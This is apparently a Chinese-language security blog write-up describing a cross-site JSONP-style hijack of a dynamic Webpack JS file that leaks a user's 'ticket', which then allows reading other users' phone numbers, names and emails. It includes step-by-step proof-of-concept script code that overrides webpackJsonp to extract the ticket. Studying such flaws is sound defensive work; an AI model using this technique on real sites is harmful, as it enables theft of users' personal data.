I"5<h1 id="动态js劫持用户信息">动态JS劫持用户信息</h1>

<p><strong>Webpack+JSONP劫持</strong></p>

<p>作者：key</p>

<p>注：本文已对敏感信息脱敏化，如有雷同纯属巧合。</p>

<h2 id="前言">前言</h2>

<p>在做测试的时候发现一个请求：</p>

<div class="language-http highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">POST</span> <span class="nn">/user/getUserInfo</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span>
<span class="na">Host</span><span class="p">:</span> <span class="s">xxxxx</span>
<span class="na">Cookie</span><span class="p">:</span> <span class="s">xxxx</span>

ticket=xxxxx
</code></pre></div></div>

<p>其对应返回的信息包含了我本身用户的敏感信息：手机号、姓名、邮箱…</p>

<p>通过BurpSuite的插件<code class="language-plaintext highlighter-rouge">Logger++</code>搜索发现该<code class="language-plaintext highlighter-rouge">ticket</code>值居然出现在了JS文件中：</p>

<p><img src="https://vulkey.oss-cn-hangzhou.aliyuncs.com/2020-01-08/15782203133182.jpg" alt="-w699" /></p>

<h2 id="确定漏洞">确定漏洞</h2>

<p>通过测试我发现以上所述请求中的<code class="language-plaintext highlighter-rouge">Cookie</code>为无效请求头，后端不对齐校验，但对<code class="language-plaintext highlighter-rouge">ticket</code>校验，也就说明此处的<code class="language-plaintext highlighter-rouge">ticket</code>代表了获取用户信息的关键参数，换种说法：<strong>当你知道用户的<code class="language-plaintext highlighter-rouge">ticket</code>参数即可获取该用户信息</strong>。</p>

<h2 id="判断js动静态">判断JS动静态</h2>

<p>当我在<code class="language-plaintext highlighter-rouge">Logger++插件</code>搜索到<code class="language-plaintext highlighter-rouge">ticket值</code>存在JS文件内容时，我的第一想法就是这个JS文件为动态类型，其文件内容跟随用户凭证字段的变化而变化。</p>

<p>测试：删除Cookie字段，结果：<code class="language-plaintext highlighter-rouge">ticket</code>参数值消失，由此可以判断该JS内容为动态类型。</p>

<p>再尝试将测试账户A的Cookie字段内容替换为测试账户B的Cookie字段内容，结果：<code class="language-plaintext highlighter-rouge">ticket</code>参数值变为测试账户B用户的对应值，由此可以判断该JS文件路径是固定的，并不是动态路径。</p>

<h2 id="webpackjsonp劫持">Webpack+JSONP劫持</h2>

<p>已知JS文件路径为：<code class="language-plaintext highlighter-rouge">https://website/app.xxxxx.js</code></p>

<p>查看其文件内容发现其被Webpack打包过：</p>

<p><img src="https://vulkey.oss-cn-hangzhou.aliyuncs.com/2020-01-08/15782208726972.jpg" alt="-w143" /></p>

<p>那么我们想要劫持这个JS文件内容其实就可以使用JSONP的PoC代码（因为这段JS文件内容就是<code class="language-plaintext highlighter-rouge">自定义函数+传入参数</code>）：</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span>
<span class="kd">function</span> <span class="nx">webpackJsonp</span><span class="p">(</span><span class="nx">data</span><span class="p">)</span> <span class="p">{</span>
	<span class="nx">alert</span><span class="p">(</span><span class="nx">data</span><span class="p">)</span>
<span class="p">}</span>
<span class="o">&lt;</span><span class="sr">/script</span><span class="err">&gt;
</span><span class="o">&lt;</span><span class="nx">script</span> <span class="nx">src</span><span class="o">=</span><span class="dl">"</span><span class="s2">https://website/app.xxxxx.js</span><span class="dl">"</span><span class="o">&gt;&lt;</span><span class="sr">/script</span><span class="err">&gt;
</span></code></pre></div></div>

<p>但这样得不到我们想要的<code class="language-plaintext highlighter-rouge">ticket</code>值，简单的看了下JS代码，这段JS代码内容的格式是这样的：</p>

<p>webpackJsonp 函数传入两个参数：第一个参数毫无用处，第二个参数传入的值包含了我们想要的<code class="language-plaintext highlighter-rouge">ticket</code>值。</p>

<p>那以上代码就可以这样修改：</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span>
<span class="kd">function</span> <span class="nx">webpackJsonp</span><span class="p">(</span><span class="nx">data</span><span class="p">,</span> <span class="nx">data1</span><span class="p">)</span> <span class="p">{</span>
	<span class="nx">alert</span><span class="p">(</span><span class="nx">data1</span><span class="p">)</span>
<span class="p">}</span>
<span class="o">&lt;</span><span class="sr">/script</span><span class="err">&gt;
</span><span class="o">&lt;</span><span class="nx">script</span> <span class="nx">src</span><span class="o">=</span><span class="dl">"</span><span class="s2">https://website/app.xxxxx.js</span><span class="dl">"</span><span class="o">&gt;&lt;</span><span class="sr">/script</span><span class="err">&gt;
</span></code></pre></div></div>

<p>但我们还是没得到我们想要的信息：</p>

<p><img src="https://vulkey.oss-cn-hangzhou.aliyuncs.com/2020-01-08/15782215229911.jpg" alt="-w517" /></p>

<p>因为第二段参数传入的值还需要进行解析，我发现这段值内容就是一段JSON对象，而对象的每个属性都在定义一个函数：</p>

<p><img src="https://vulkey.oss-cn-hangzhou.aliyuncs.com/2020-01-08/15782216768669.jpg" alt="-w411" /></p>

<p>寻找<code class="language-plaintext highlighter-rouge">ticket</code>所在函数位置，发现其在<code class="language-plaintext highlighter-rouge">jbTV: function...</code>内，知道了所在函数位置，PoC代码只需要这样进行构建：</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span>
<span class="kd">function</span> <span class="nx">webpackJsonp</span><span class="p">(</span><span class="nx">data</span><span class="p">,</span> <span class="nx">data1</span><span class="p">)</span> <span class="p">{</span>
	<span class="nx">alert</span><span class="p">(</span><span class="nx">data1</span><span class="p">[</span><span class="dl">'</span><span class="s1">jbTV</span><span class="dl">'</span><span class="p">])</span>
<span class="p">}</span>
<span class="o">&lt;</span><span class="sr">/script</span><span class="err">&gt;
</span><span class="o">&lt;</span><span class="nx">script</span> <span class="nx">src</span><span class="o">=</span><span class="dl">"</span><span class="s2">https://website/app.xxxxx.js</span><span class="dl">"</span><span class="o">&gt;&lt;</span><span class="sr">/script</span><span class="err">&gt;
</span></code></pre></div></div>

<p>访问，成功获取：</p>

<p><img src="https://vulkey.oss-cn-hangzhou.aliyuncs.com/2020-01-08/15782218407604.jpg" alt="-w1239" /></p>

<p>后面只需要稍微的加个正则就可以了～</p>

<h2 id="攻击方式">攻击方式</h2>

<p>用户登录状态，访问该漏洞页面，触发即可获取到<code class="language-plaintext highlighter-rouge">ticket</code>值，将该值带入以上所列请求中即可越权获取用户信息</p>

<h1 id="结尾">结尾</h1>

<p>心细一点，漏洞就在眼前，</p>
:ET